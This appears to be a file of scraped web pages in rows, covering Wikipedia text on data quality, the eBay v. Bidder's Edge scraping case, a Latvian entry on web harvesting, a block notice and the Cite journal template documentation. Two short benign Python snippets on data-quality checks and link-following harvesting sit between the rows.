literature suggests that data quality dimensions and methods with real world data are not consistent in the literature, and as a result quality assessments are challenging due to the complex and heterogeneous nature of these data. 11 Before the rise of inexpensive computer data storage, massive mainframe computers were used to maintain name and address data for delivery services. This was so that mail could be properly routed to its destination. The mainframes used business rules to correct common misspellings and typographical errors in name and address data, as well as to track customers who had moved, died, gone to prison, married, divorced, or experienced other life-changing events. Government agencies began to make postal data available to a few service companies to cross-reference customer data with the National Change of Address registry (NCOA). This technology saved large companies millions of dollars in comparison to manual correction of customer data. Large companies saved on postage, as bills and direct marketing materials made their way to the intended customer more accurately. Initially sold as a service, data quality moved inside the walls of corporations as low-cost and powerful server technology became available. Companies with an emphasis on marketing often focused their quality efforts on name and address information, but data quality is recognized as an important property of all types of data. 
Principles of data quality can be applied to supply chain data, transactional data, and nearly every other category of data found. For example, making supply chain data conform to a certain standard has value to an organization by: 1) avoiding overstocking of similar but slightly different stock; 2) avoiding false stock-outs; 3) improving the understanding of vendor purchases to negotiate volume discounts; and 4) avoiding logistics costs in stocking and shipping parts across a large organization. For companies with significant research efforts, data quality can include developing protocols for research methods, reducing measurement error, bounds checking of data, cross tabulation, modeling and outlier detection, verifying data integrity, etc. There are a number of theoretical frameworks for understanding data quality. A systems-theoretical approach influenced by American pragmatism expands the definition of data quality to include information quality, and emphasizes the inclusiveness of the fundamental dimensions of accuracy and precision on the basis of the theory of science (Ivanov, 1972). One framework, dubbed "Zero Defect Data" (Hansen, 1991), adapts the principles of statistical process control to data quality. Another framework seeks to integrate the product perspective (conformance to specifications) and the service perspective (meeting consumers' expectations) (Kahn et al. 2002). Another framework is based in semiotics to evaluate the quality of the form, meaning, and use of the data (Price and Shanks, 2004). One highly theoretical approach analyzes the ontological nature of information systems to define data quality rigorously (Wand and Wang, 1996). A considerable amount of data quality research involves investigating and describing various categories of desirable attributes (or dimensions) of data. Nearly 200 such terms have been identified, and there is little agreement on their nature (are these concepts, goals or criteria?), their definitions or measures (Wang et al., 1993). Software engineers may recognize this as a similar problem to "ilities". MIT has an Information Quality (MITIQ) Program, led by Professor Richard Wang, which produces a large number of publications and hosts a significant international conference in this field (International Conference on Information Quality, ICIQ). This program grew out of the work done by Hansen on the "Zero Defect Data" framework (Hansen, 1991). In practice, data quality is a concern for professionals involved with a wide range of information systems, ranging from data warehousing and business intelligence to customer relationship management and supply chain management. One industry study estimated the total cost to the U.S. economy of data quality problems at over U.S. $600 billion per annum (Eckerson, 2002). Incorrect data, which includes invalid and outdated information, can originate from different data sources through data entry, or data migration and conversion projects. 12 In 2002, the USPS and PricewaterhouseCoopers released a report stating that 23.6 percent of all U.S. mail sent is incorrectly addressed. 13 One reason contact data becomes stale very quickly in the average database is that more than 45 million Americans change their address every year. 14 In fact, the problem is such a concern that companies are beginning to set up a data governance team whose sole role in the corporation is to be responsible for data quality. In some 
organizations, this data governance function has been established as part of a larger Regulatory Compliance function, a recognition of the importance of data and information quality to organizations. Problems with data quality don't only arise from incorrect data; inconsistent data is a problem as well. Eliminating data shadow systems and centralizing data in a warehouse is one of the initiatives a company can take to ensure data consistency. Enterprises, scientists, and researchers are starting to participate within data curation communities to improve the quality of their common data. 15 The market is going some way to providing data quality assurance. A number of vendors make tools for analyzing and repairing poor quality data in situ, service providers can clean the data on a contract basis, and consultants can advise on fixing processes or systems to avoid data quality problems in the first place. Most data quality tools offer a series of tools for improving data, which may include some or all of the following: ISO 8000 is an international standard for data quality. 16 Data quality assurance is the process of data profiling to discover inconsistencies and other anomalies in the data, as well as performing data cleansing 17 18 activities (e.g. removing outliers, missing data interpolation) to improve the data quality. These activities can be undertaken as part of data warehousing or as part of the database administration of an existing piece of application software. 19 Data quality control is the process of controlling the usage of data for an application or a process. This process is performed both before and after a Data Quality Assurance (QA) process, which consists of discovery of data inconsistency and correction. Before: After the QA process, the following statistics are gathered to guide the Quality Control (QC) process: The Data QC process uses the information from the QA process to decide whether to use the data for analysis or in an application or business process. General example: if a Data QC process finds that the data contains too many errors or inconsistencies, then it prevents that data from being used for its intended process, which could cause disruption. Specific example: providing invalid measurements from several sensors to the automatic pilot feature on an aircraft could cause it to crash. Thus, establishing a QC process provides data usage protection. Data Quality (DQ) is a niche area required for the integrity of data management, covering gaps in data issues. This is one of the key functions that aid data governance by monitoring data to find exceptions undiscovered by current data management operations. Data quality checks may be defined at the attribute level to have full control over remediation steps. DQ checks and business rules may easily overlap if an organization is not attentive to its DQ scope. Business teams should understand the DQ scope thoroughly in order to avoid overlap. Data quality checks are redundant if business logic covers the same functionality and fulfills the same purpose as DQ. The DQ scope of an organization should be defined in the DQ strategy and well implemented. Some data quality checks may be translated into business rules after repeated instances of exceptions in the past. Below are a few areas of data flows that may need perennial DQ checks: Completeness and precision DQ checks on all data may be performed at the point of entry for each mandatory attribute from each source system. 
A few attribute values are created well after the initial creation of the transaction; in such cases, administering these checks becomes tricky and should be done immediately after the defined event of that attribute's source and the transaction's other core attribute conditions are met. All data having attributes referring to Reference Data in the organization may be validated against the set of well-defined valid values of Reference Data to discover new or discrepant values through the validity DQ check. Results may be used to update Reference Data administered under Master Data Management (MDM). All data sourced from a third party to the organization's internal teams may undergo an accuracy (DQ) check against the third-party data. These DQ check results are valuable when administered on data that made multiple hops after the point of entry of that data but before that data becomes authorized or stored for enterprise intelligence. All data columns that refer to Master Data may be validated for consistency. A DQ check administered on the data at the point of entry discovers new data for the MDM process, but a DQ check administered after the point of entry discovers the failure (not exceptions) of consistency. As data is transformed, multiple timestamps and their positions are captured and may be compared against each other and against an allowed leeway to validate the data's value, decay, and operational significance against a defined SLA (service level agreement). This timeliness DQ check can be used to decrease the data value decay rate and to optimize the policies of the data movement timeline. In an organization, complex logic is usually segregated into simpler logic across multiple processes. Reasonableness DQ checks on such complex logic, which should yield a logical result within a specific range of values or static interrelationships (aggregated business rules), may be used to discover complicated but crucial business processes, outliers in the data and its drift from BAU (business as usual) expectations, and may surface possible exceptions eventually resulting in data issues. This check may be a simple generic aggregation rule applied to a large chunk of data, or it can be complicated logic on a group of attributes of a transaction pertaining to the core business of the organization. This DQ check requires a high degree of business knowledge and acumen. Discovery of reasonableness issues may aid policy and strategy changes by either the business or data governance or both. Conformity checks and integrity checks need not be covered in all business needs; they are strictly at the database architect's discretion. There are many places in the data movement where DQ checks may not be required. For instance, a DQ check for completeness and precision on not-null columns is redundant for data sourced from a database. Similarly, data should be validated for its accuracy with respect to time when the data is stitched across disparate sources. However, that is a business rule and should not be in the DQ scope. Regrettably, from a software development perspective, DQ is often seen as a nonfunctional requirement. As such, key data quality check processes are not factored into the final software solution. Within healthcare, wearable technologies or Body Area Networks generate large volumes of data. 20 The level of detail required to ensure data quality is extremely high and is often underestimated. 
This is also true for the vast majority of mHealth apps, EHRs, and other health-related software solutions. However, some open source tools exist that examine data quality. 21 The primary reason for this stems from the extra cost involved in adding a higher degree of rigor within the software architecture. The use of mobile devices in health, or mHealth, creates new challenges to health data security and privacy in ways that directly affect data quality. 2 mHealth is an increasingly important strategy for delivery of health services in low- and middle-income countries. 22 Mobile phones and tablets are used for collection, reporting, and analysis of data in near real time. However, these mobile devices are commonly used for personal activities as well, leaving them more vulnerable to security risks that could lead to data breaches. Without proper security safeguards, this personal use could jeopardize the quality, security, and confidentiality of health data. 23 Data quality has become a major focus of public health programs in recent years, especially as demand for accountability increases. 24 Work towards ambitious goals related to the fight against diseases such as AIDS, tuberculosis, and malaria must be predicated on strong monitoring and evaluation systems that produce quality data related to program implementation. 25 These programs, and program auditors, increasingly seek tools to standardize and streamline the process of determining the quality of data, 26 verify the quality of reported data, and assess the underlying data management and reporting systems for indicators. 27 An example is WHO and MEASURE Evaluation's Data Quality Review Tool. 28 WHO, the Global Fund, GAVI, and MEASURE Evaluation have collaborated to produce a harmonized approach to data quality assurance across different diseases and programs. 29 There are a number of scientific works devoted to the analysis of data quality in open data sources, such as Wikipedia, Wikidata, DBpedia, and others. In the case of Wikipedia, quality analysis may relate to the whole article. 30 Quality modeling there is carried out by means of various methods; some of them use machine learning algorithms, including Random Forest, 31 Support Vector Machine, 32 and others. Methods for assessing data quality in Wikidata, DBpedia, and other LOD sources differ. 33 The Electronic Commerce Code Management Association (ECCMA) is a member-based, international not-for-profit association committed to improving data quality through the implementation of international standards. ECCMA is the current project leader for the development of ISO 8000 and ISO 22745, which are the international standards for data quality and the exchange of material and service master data, respectively. ECCMA provides a platform for collaboration amongst subject experts on data quality and data governance around the world to build and maintain global, open standard dictionaries that are used to unambiguously label information. The existence of these dictionaries of labels allows information to be passed from one computer system to another without losing meaning. 35 |
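The attribute-level checks described in the scraped article above (completeness, validity against reference data, timeliness against an SLA) can be illustrated with pandas, which this notebook already imports. This is a minimal, hypothetical sketch: the column names, the reference-data set, and the SLA cut-off are all assumptions made for the example, not values from the article.

import pandas as pd

# Hypothetical records with deliberate quality problems (assumed schema, not from the article)
records = pd.DataFrame({
    "customer_id": [1, 2, 3, 4],
    "country": ["US", "DE", None, "XX"],  # None -> completeness failure, "XX" -> validity failure
    "updated_at": pd.to_datetime(["2024-01-05", "2024-01-06", "2023-06-01", "2024-01-07"]),
})

valid_countries = {"US", "DE", "FR"}      # assumed reference data (an MDM-style valid-value set)
sla_cutoff = pd.Timestamp("2024-01-01")   # assumed timeliness SLA

completeness_failures = records[records["country"].isna()]
validity_failures = records[records["country"].notna() & ~records["country"].isin(valid_countries)]
timeliness_failures = records[records["updated_at"] < sla_cutoff]

print(len(completeness_failures), "completeness exceptions")
print(len(validity_failures), "validity exceptions")
print(len(timeliness_failures), "timeliness exceptions")

Each filter isolates one kind of exception so it can be routed to its own remediation step, mirroring the attribute-level control the text describes.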
290 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/EBay_v._Bidder%27s_Edge | eBay v. Bidder's Edge, 100 F. Supp. 2d 1058 (N.D. Cal. 2000), was a leading case applying the trespass to chattels doctrine to online activities. 1 2 In 2000, eBay, an online auction company, successfully used the 'trespass to chattels' theory to obtain a preliminary injunction preventing Bidder's Edge, an auction data aggregator, from using a 'crawler' to gather data from eBay's website. 1 2 3 The opinion was a leading case applying 'trespass to chattels' to online activities, although its analysis has been criticized in more recent jurisprudence. Bidder's Edge ("BE") was founded in 1997 as an "aggregator" of auction listings. 1 : 1061 Its website provided a database of auction listings that BE automatically collected from various auction sites, including eBay. 1 : 1061 Accordingly, BE's users could easily search auction listings from throughout the web rather than having to go to each individual auction site. 1 : 1061 eBay's "User Agreement" (terms of use) and "robot exclusion headers" (robots.txt) disallowed crawling of auction listings without prior permission. 1 : 1060 4 5 In early 1998, eBay allowed BE to include Beanie Babies and Furby auction listings in BE's database. 1 : 1062 It is unclear whether BE scraped these listings from eBay or linked to them in some other format. However, on April 24, 1999, eBay verbally approved BE automatically "crawling" the eBay web site for a period of 90 days. 1 : 1062 During this time, the parties contemplated striking a formal license agreement. 1 : 1062 These negotiations did not conclude successfully because the parties could not agree on technical issues. 1 Subsequently, in early 1999, BE added auction listings from many other sites to its database, including eBay's. Despite the integration of many websites' listings, nearly 69% of the listings in BE's database were from eBay. 1 : 1063 eBay wanted BE to access the eBay system only when a BE user queried the BE system. 1 : 1062 Doing so would increase the accuracy and currency of the data BE presented to its users and impose a lighter load on eBay's network. 1 BE accessed eBay approximately 100,000 times a day, constituting about 1.53% of eBay's total daily requests. 1 : 1063 BE wanted to periodically crawl eBay's entire website to compile its own auction database, which would increase the speed of BE's response to user queries and allow BE to notify its users when eBay auctions changed. 1 : 1063 Due to the disagreement regarding technical issues, at the end of the 90-day period, eBay notified BE that its activities were no longer permitted, but eBay offered again to license BE's activities. BE did not accept eBay's offer. 1 : 1068 In late August or early September 1999, eBay requested by telephone that BE cease posting eBay auction listings on its site. 1 : 1062 BE agreed to do so. In October 1999, BE learned that other auction aggregation sites were including information about eBay auctions. 1 : 1062 On November 2, 1999, BE issued a press release indicating that it had resumed including eBay auction listings on its site. On November 9, 1999, eBay sent BE a letter reasserting that BE's activities were unauthorized, insisting that BE cease accessing the eBay site, alleging that BE's activities constituted a trespass of eBay's chattels, and offering to license BE's activities. 
1 : 1062 As a result, eBay attempted to block BE from accessing the eBay site; by the end of November 1999, eBay had blocked a total of 169 IP addresses it believed BE was using to query eBay's system. 1 : 1062 BE continued crawling eBay's site by using proxy servers to evade eBay's IP address blocks. 3 Information requests sent through such servers cannot easily be traced back to the originating IP address, which allowed Bidder's Edge to evade eBay's attempts to block queries from the originating IP address. 3 1 : 1061 eBay sued Bidder's Edge on December 10, 1999, in the Northern District of California federal court. 1 : 1065 eBay moved for a preliminary injunction on the following causes of action: BE filed antitrust counterclaims on February 7, 2000. 1 : 1073 The counterclaims charged eBay with monopolization, attempted monopolization, unfair business practices and interference with contractual relations. 1 : 1063 On May 24, 2000, District Court Judge Whyte found that eBay had established a sufficient likelihood of prevailing on the trespass claim to support eBay's requested injunctive relief. Because the court found eBay entitled to the relief requested based on its trespass claim, the court did not address the remaining claims. 1 : 1063 The opinion first addressed the merits of the trespass claim, then BE's arguments regarding copyright preemption of the trespass claim, and finally the public interest. 1 : 1063 The court said that eBay's trespass to chattels claim required it to show that: eBay argued that BE's use was unauthorized and intentional. 1 : 1061 The court said that eBay had not permitted BE's activity simply by having a website available over the Internet. 1 : 1070 BE had violated eBay's terms of use and ignored eBay's requests to stop using its crawlers. BE responded that it was not causing eBay irreparable harm because its activity (80,000 to 100,000 hits per day) represented only a small fraction (approximately 1 percent) of the overall activity on eBay's site. eBay acknowledged that BE's activity was only a relatively slight interference with eBay's servers. 1 : 1071 Nevertheless, the court found that although BE's interference was not substantial, "any intermeddling with or use of another's personal property" established BE's possessory interference with eBay's chattel. 1 Further, BE's use of eBay's bandwidth and system resources, even though small, harmed eBay because other companies might follow BE's example: "If the court were to hold otherwise, it would likely encourage other auction aggregators to crawl the eBay site, potentially to the point of denying effective access to eBay's customers. If preliminary injunctive relief were denied, and other aggregators began to crawl the eBay site, there appears to be little doubt that the load on eBay's computer system would qualify as a substantial impairment of condition or value." 1 : 1072 The parties argued that the Internet would cease to function if, according to eBay, personal and intellectual property rights were not respected, or, according to BE, if information published on the Internet could not be universally accessed and used. 1 : 1072 The court suspected that the Internet would not only survive but continue to grow and develop regardless of its ruling. 1 : 1072 The court noted that, particularly on the limited record available at the preliminary injunction stage, it was unable to determine whether the general public interest factors favored or opposed a preliminary injunction. 
1 : 1072 BE also argued that eBay engaged in anticompetitive behavior. 1 : 1072 However, the district court was not obligated to consider the merits of any antitrust counterclaims once it decided that eBay had a likelihood of success on the merits. 1 : 1072 Based on its findings, the court issued a preliminary injunction against BE from "using any automated query program, robot, or similar device to access eBay's computer systems or networks for the purpose of copying any part of eBay's auction database." 1 : 1073 One day after it filed federal antitrust charges against eBay, Bidder's Edge announced it would be acquired by OpenSite, an auction software company. However, the deal fell through when Siebel Systems bought OpenSite. 6 eBay and Bidder's Edge settled their legal disputes in March 2001. 7 As part of the settlement, Bidder's Edge paid eBay an undisclosed amount and agreed not to access and re-post eBay's auction information. 8 The settlement also required BE to drop its appeal of the preliminary injunction. 9 Meanwhile, Bidder's Edge shut down its website on February 21, 2001. 10 In 2003, the California Supreme Court implicitly overruled the eBay v. Bidder's Edge opinion in Intel v. Hamidi, a case interpreting California's common law trespass to chattels. The Hamidi court considered the eBay court's analysis, which stated that if BE's activity were allowed to continue unchecked, it would encourage other auction aggregators to engage in similar searching, which would cause eBay irreparable harm. In analyzing this point, the Hamidi court stated, "We do not read the eBay decision as expressing the court's complete view of the issue. In isolation, moreover, it would not be a correct statement of California or general American law on this point." As a result, the opinion may or may not still be valid precedent. Further, since eBay was issued, some courts have become more circumspect about the "slippery slope" argument that eBay successfully made about additional crawlers following BE's lead. For example, in White Buffalo Ventures LLC v. University of Texas at Austin, the Fifth Circuit said: "Since the spider does not cause physical injury to the chattel, there must be some evidence that the use or utility of the computer (or computer network) being 'spiderized' is adversely affected by the use of the spider. No such evidence is presented here. This court respectfully disagrees with other district courts' finding that mere use of a spider to enter a publicly available web site to gather information, without more, is sufficient to fulfill the harm requirement for trespass to chattels." 11 |
291 | https://en.wikipedia.org/wiki/Web_scraping | https://lv.wikipedia.org/wiki/Rasmo%C5%A1ana | Rasmošana 1 (Latvian; a calque of the English "web harvesting", i.e. gathering the web's harvest, from the words "raža" (harvest) and "rasma", a synonym of "birums" (yield)) is the automated collection, publication, and archiving of material available online. Harvesting begins by determining and compiling the list of URLs that will be needed for the subsequent use of the information. The program then downloads the URLs. Hyperlinks found on the internet may be followed or ignored depending on the program's settings. Unlike an ordinary crawler program, harvesting has a defined search depth and stops only when the whole URL list has been exhausted. Harvesting allows internet search engines to index the information a searcher needs. The downloaded content is then indexed and transformed into a web application that is easy for the user to use. In Latvia, websites are harvested by the National Library of Latvia (Latvijas Nacionālā bibliotēka). Until 2007, the Heritrix, NutchWAX, and WERA software was used for harvesting; since 2008, the Web Curator Tool and Wayback Machine software have been used. |
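The harvesting loop described in the translated entry above (start from a seed URL list, download each page, follow hyperlinks only to a fixed depth, and stop when the list is exhausted) can be sketched with libraries this notebook already imports. This is an illustrative sketch under assumed behavior, not the National Library of Latvia's actual tooling; the seed URL is a placeholder.

import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

def harvest(seed_urls, max_depth=1):
    """Return {url: html} for pages reachable from the seeds within max_depth link hops."""
    collected = {}
    frontier = [(url, 0) for url in seed_urls]
    while frontier:                                  # stops only when the URL list is exhausted
        url, depth = frontier.pop()
        if url in collected or depth > max_depth:
            continue
        try:
            html = requests.get(url, timeout=10).text
        except requests.RequestException:
            continue                                 # skip unreachable pages
        collected[url] = html
        if depth < max_depth:                        # follow hyperlinks only within the depth limit
            soup = BeautifulSoup(html, "html5lib")
            for link in soup.find_all("a", href=True):
                frontier.append((urljoin(url, link["href"]), depth + 1))
    return collected

# pages = harvest(["https://example.org/"], max_depth=1)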
292 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit&section=9 | (No article content was scraped: the target URL returned a Wikipedia edit-permission and IP-block notice rather than an article.) |
293 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Template:Cite_journal | This Citation Style 1 template is used to create citations for academic and scientific papers published in bona fide journals. For articles in magazines and newsletters, use cite magazine. For academic and scientific papers not published in bona fide journals, please use one of the templates listed on this page in the "Citation Style 1 templates" box. If you have a digital object identifier (DOI) for the journal reference you wish to add, Wikipedia has a citation bot that will read that DOI and expand it into a full reference with the author's name, journal name, date, volume, issue, pages, etc. You can view instructions on how to add this gadget to your Wikipedia preferences at User:Citation bot use. Copy a blank version to use. Almost all parameter names are supported only in lower case (some initialisms, such as isbn, have upper-case aliases like ISBN, which are acceptable for use). Use the | (pipe) character between each parameter. Unused parameters may be deleted to avoid clutter in the edit window. Some samples on this documentation page may include the current date. If the date is not current, then purge the page. To cite a professional or scientific journal Vancouver system author style for a scientific journal or To cite a journal article with no credited author To cite an online article that has been archived To cite a journal article written in a foreign language To cite and quote an archived, two-author, foreign language journal article re-published as a PDF on an information aggregation service requiring a subscription Displays as: Displays as: or Displays as: Displays as: If the linked document is PDF, but the extension is not .pdf or .PDF, you may add the parameter format=PDF, which displays (PDF) after the link. Displays as: Whereas if the URL had not been specified, then the title is linked to the PMC link, which is repeated: Displays as: If the doi link is broken, then use of doi-broken-date indicates when the doi problem was last verified, and will also add the page to "CS1 maint: DOI inactive as of Mmmm YYYY" (tracking category Category:CS1 maint: DOI inactive): Displays as: Displays as: Displays as: Nested parameters rely on their parent parameters: By default, sets of fields are terminated with a period (.). This template embeds COinS metadata in the HTML output, allowing reference management software to retrieve bibliographic metadata. See Wikipedia:COinS. As a general rule, only one data item per parameter. Do not include explanatory or alternate text: Use of templates within the citation template is discouraged because many of these templates will add extraneous HTML or CSS that will be included raw in the metadata. Also, HTML entities, for example &nbsp;, &ndash;, or &#160;, should not be used in parameters that contribute to the metadata. Note: This table of metadata is displayed in the documentation of all Citation Style 1 templates. Not all of these parameters are supported by every CS1 template. Some of these parameters are mutually exclusive, some are aliases of another parameter, and some require other parameters to be present. A full list of this template's supported parameters, their aliases, and their dependencies is shown in the Usage section near the top of this documentation page. (See also Help:Citation Style 1 Titles and chapters.) URLs must begin with a supported URI scheme. 
http: and https: will be supported by all browsers; however, ftp:, gopher:, irc:, ircs:, mailto:, and news: may require a plug-in or an external application and should normally be avoided. IPv6 host-names are currently not supported. If URLs in citation template parameters contain certain characters, then they will not display and link correctly. Those characters need to be percent-encoded. For example, a space must be replaced by %20. To encode the URL, replace the following characters with: Single apostrophes do not need to be encoded; however, unencoded multiples will be parsed as italic or bold markup. Single curly closing braces also do not need to be encoded; however, an unencoded pair will be parsed as the double closing braces for the template transclusion. The following identifiers create links and are designed to accept a single value. Using multiple values or other text will break the link and/or invalidate the identifier. In general, the parameters should include only the variable part of the identifier, e.g. rfc=822 or pmc=345678. In very rare cases, identifiers are published which do not follow their defined standard format or use non-conforming checksums. These would typically cause an error message to be shown. Do not alter them to match a different checksum. In order to suppress the error message, some identifiers (doi, eissn, isbn, issn, and sbn) support a special accept-this-as-written markup which can be applied to disable the error-checking (as param=((value))). If the problem is down to a mere typographical error in a third-party source, correct the identifier value instead of overriding the error message. For some identifiers, it is possible to specify the access status using the corresponding param-access parameter. For cite journal, some identifiers (specifying free resources) will automatically be linked to the title when url and title-link are not used to specify a different link target. This behaviour can be overridden by one out of a number of special keywords for title-link to manually select a specific source (title-link=pmc or title-link=doi) for auto-linking or to disable the feature (title-link=none). It is not necessary to specify a URL to a link identical to a link also produced by an identifier. The url parameter (or title-link) can then be used for providing a direct deep link to the corresponding document or a convenience link to a resource that would not otherwise be obviously accessible. Citations of online sources that require registration or a subscription are acceptable in Wikipedia as documented in Verifiability Access to sources. As a courtesy to readers and other editors, editors should signal restrictions on access to material provided via the external links included in a citation. These levels describe requirements or constraints related to accessing and viewing the cited material; they are not intended to indicate the ability to reuse, or the copyright status, of the material, since that status is not relevant to verifying claims in articles. Four access levels can be used: As there are often multiple external links with different access levels in the same citation, each value is attributed to a specific external link. Online sources linked by url, article-url, chapter-url, contribution-url, entry-url, map-url, and section-url are presumed to be free-to-read. 
When they are not free-to-read, editors should mark those sources with the matching access-indicator parameter so that an appropriate icon is included in the rendered citation. Because the sources linked by these URL-holding parameters are presumed to be free-to-read, they are not marked as free. If the registration, limited, or subscription access to the source goes dead and is no longer available, then remove the access-indicator parameter and add archive-url and archive-date values if possible. For example, this cites a web page that requires registration but not subscription: which renders as: Links inserted by named identifiers are presumed to lie behind a paywall or registration barrier (exceptions listed below). When they are free-to-read, editors should mark those sources with the matching access-indicator parameter so that an appropriate icon is included in the rendered citation. When the sources linked by these named-identifier parameters are not presumed to carry a free-to-read full text (for instance because they're just abstracting services), they may not be marked as limited, registration, or subscription. Some named identifiers are always free-to-read. For those named identifiers there are no access-indicator parameters; the access level is automatically indicated by the template. These named identifiers are: For embargoed pmc that will become available in the future, see pmc-embargo-date. Although it may appear redundant to include multiple ids for articles, it is helpful for many editors who only have access to a certain resource. If only one ID is to be included, the DOI should be used, as this is the universal standard preferred by professional publications. Specifying a link as a DOI, PMID, etc. is always preferable to including it as a URL parameter, as it makes it clear that the link is accurate and stable, but not necessarily openly accessible. access-date is not necessary when a permanent identifier is used. TemplateData for Cite journal This template formats a citation to an article in a magazine or journal, using the provided source information (e.g. journal name, author, title, issue, URL) and various formatting options. Template parameters This template has custom formatting. 
The surname of the author; don't wikilink, use 'author-link'; can suffix with a numeral to add additional authors Given or first name, middle names, or initials of the author; don't wikilink, use 'author-link'; can suffix with a numeral to add additional authors Title of existing Wikipedia article about the author; can suffix with a numeral to add additional authors The surname of the second author; don't wikilink, use 'author-link2' Given or first name, middle names, or initials of the second author; don't wikilink Title of existing Wikipedia article about the second author The surname of the third author; don't wikilink, use 'author-link3' Given or first name, middle names, or initials of the third author; don't wikilink Title of existing Wikipedia article about the third author The surname of the fourth author; don't wikilink, use 'author-link4' Given or first name, middle names, or initials of the fourth author; don't wikilink Title of existing Wikipedia article about the fourth author The surname of the fifth author; don't wikilink, use 'author-link5' Given or first name, middle names, or initials of the fifth author; don't wikilink Title of existing Wikipedia article about the fifth author The surname of the sixth author; don't wikilink, use 'author-link6' Given or first name, middle names, or initials of the sixth author; don't wikilink Title of existing Wikipedia article about the sixth author The surname of the seventh author; don't wikilink, use 'author-link7' Given or first name, middle names, or initials of the seventh author; don't wikilink Title of existing Wikipedia article about the seventh author The surname of the eighth author; don't wikilink, use 'author-link8' Given or first name, middle names, or initials of the eighth author; don't wikilink Title of existing Wikipedia article about the eighth author The surname of the ninth author; don't wikilink, use 'author-link9'. Given or first name, middle names, or initials of the ninth author; don't wikilink Title of existing Wikipedia article about the ninth author The surname of the tenth author; don't wikilink, use 'author-link10'. Given or first name, middle names, or initials of the tenth author; don't wikilink Title of existing Wikipedia article about the tenth author The surname of the 11th author; don't wikilink, use 'author-link11'. Given or first name, middle names, or initials of the 11th author; don't wikilink Title of existing Wikipedia article about the 11th author The surname of the 12th author; don't wikilink, use 'author-link12'. Given or first name, middle names, or initials of the 12th author; don't wikilink Title of existing Wikipedia article about the 12th author The surname of the 13th author; don't wikilink, use 'author-link13'. Given or first name, middle names, or initials of the 13th author; don't wikilink Title of existing Wikipedia article about the 13th author The surname of the 14th author; don't wikilink, use 'author-link14'. Given or first name, middle names, or initials of the 14th author; don't wikilink Title of existing Wikipedia article about the 14th author The surname of the 15th author; don't wikilink, use 'author-link15'. Given or first name, middle names, or initials of the 15th author; don't wikilink Title of existing Wikipedia article about the 15th author number of authors to display before 'et al. 
is used; Replaces the name of the first author with em dashes or text; set to a numeric value 'n' to set the dash 'n' em spaces wide; set to a text value to display the text without a trailing author separator; for example, 'with' instead Set to 'amp' or 'and' to change the separator between the last two names on the name list to '&' or 'and', respectively. Set to 'vanc' to display name lists in Vancouver style. Comma-separated list of author names in Vancouver style; enclose corporate or institutional author names in doubled parentheses Date of the source; do not wikilink. As listed in the publication Year of the source being referenced; recommended only when date parameter format is YYYY-MM-DD and a CITEREF disambiguator is needed Original date of publication; provide specifics The surname of the editor; don't wikilink, use 'editor-link'; can suffix with a numeral to add additional editors; alias of 'editor1-last', 'editor' Given or first name, middle names, or initials of the editor; don't wikilink, use 'editor-link'; can suffix with a numeral to add additional editors; alias of 'editor1-first' Title of existing Wikipedia article about the editor; can suffix with a numeral to add additional editors; alias of 'editor1-link' The surname of the second editor; don't wikilink, use 'editor2-link' Given or first name, middle names, or initials of the second editor; don't wikilink Title of existing Wikipedia article about the second editor The surname of the third editor; don't wikilink, use 'editor3-link' Given or first name, middle names, or initials of the third editor; don't wikilink Title of existing Wikipedia article about the third editor The surname of the fourth editor; don't wikilink, use 'editor4-link' Given or first name, middle names, or initials of the fourth editor; don't wikilink Title of existing Wikipedia article about the fourth editor The surname of the fifth editor; don't wikilink, use 'editor5-link' Given or first name, middle names, or initials of the fifth editor; don't wikilink Title of existing Wikipedia article about the fifth editor The surname of the sixth editor; don't wikilink, use 'editor6-link' Given or first name, middle names, or initials of the sixth editor; don't wikilink Title of existing Wikipedia article about the sixth editor The surname of the seventh editor; don't wikilink, use 'editor7-link' Given or first name, middle names, or initials of the seventh editor; don't wikilink Title of existing Wikipedia article about the seventh editor The surname of the eighth editor; don't wikilink, use 'editor8-link' Given or first name, middle names, or initials of the eighth editor; don't wikilink Title of existing Wikipedia article about the eighth editor The surname of the ninth editor; don't wikilink, use 'editor9-link' Given or first name, middle names, or initials of the ninth editor; don't wikilink Title of existing Wikipedia article about the ninth editor Used to record other contributions to the work, such as 'Illustrated by John Smith' or 'Translated by John Smith' The title of the article; can be wikilinked to an existing Wikipedia article or 'url' may be used to add an external link, but not both. Displays in quotes. For titles in languages that do not use a Latin-based alphabet (Arabic, Chinese, Cyrillic, Greek, Hebrew, Japanese, Korean, Vietnamese, etc). Prefix with a two-character ISO 639-1 language code followed by a colon. For Japanese use: script-title=ja:...
An English language title, if the source cited is in a foreign language; 'language' is recommended The URL of the online location where the text of the publication can be found. Requires schemes of the type "http://..." or maybe even the protocol-relative scheme "//..." If set to 'live', the title displays with the URL linked; if set to 'dead', the title displays with the archive URL linked Format of the work referred to by 'url' ('url' is required when using 'format'); examples: PDF, DOC, XLS; do not specify HTML Department (section) within the periodical Name of the source journal; may be wikilinked; displays in italics; alias of 'work' The chapter heading of the source Additional information about the media type of the source; format in sentence case Series identifier when the source is part of a series, such as a book series or a journal; alias of 'version' The language in which the source is written, if not English; use a two-letter language code or the full language name. Do not use icons or templates When the publication has more than one edition; for example: '2nd', 'Revised' etc.; suffixed with ed. Geographical place of publication; usually not wikilinked; omit when the publication name includes place; alias of 'place' Name of the publisher; may be wikilinked; displays after title Publication place shows after title; if 'place' or 'location' are also given, they are displayed before the title prefixed with 'written at' Date of publication when different from the date the work was written; do not wikilink For one publication published in several volumes, usually a number. Do not prepend with v. or vol. Issue identifier when the source is part of a series that is published periodically, usually a number. Do not prepend with no. Page in the source that supports the content; displays after 'p.' Pages in the source that support the content (not an indication of the number of pages in the source); displays after 'pp.' May be used instead of 'page' or 'pages' where a page number is inappropriate or insufficient Set to 'y' to suppress the 'p.' or 'pp.' display with 'page' or 'pages' when inappropriate (such as 'Front cover') An identifier for arXiv electronic preprints of scientific papers Amazon Standard Identification Number; 10 characters ASIN top-level domain for Amazon sites other than the US Bibliographic Reference Code (REFCODE); 19 characters bioRxiv identifier; full DOI CiteSeerX identifier; found after the 'doi=' query parameter Digital Object Identifier; begins with '10.' The date that the DOI was determined to be broken International Standard Book Number; use the 13-digit ISBN where possible International Standard Serial Number (print); 8 characters; usually split into two groups of four using a hyphen International Standard Serial Number (online); 8 characters; usually split into two groups of four using a hyphen Jahrbuch über die Fortschritte der Mathematik classification code 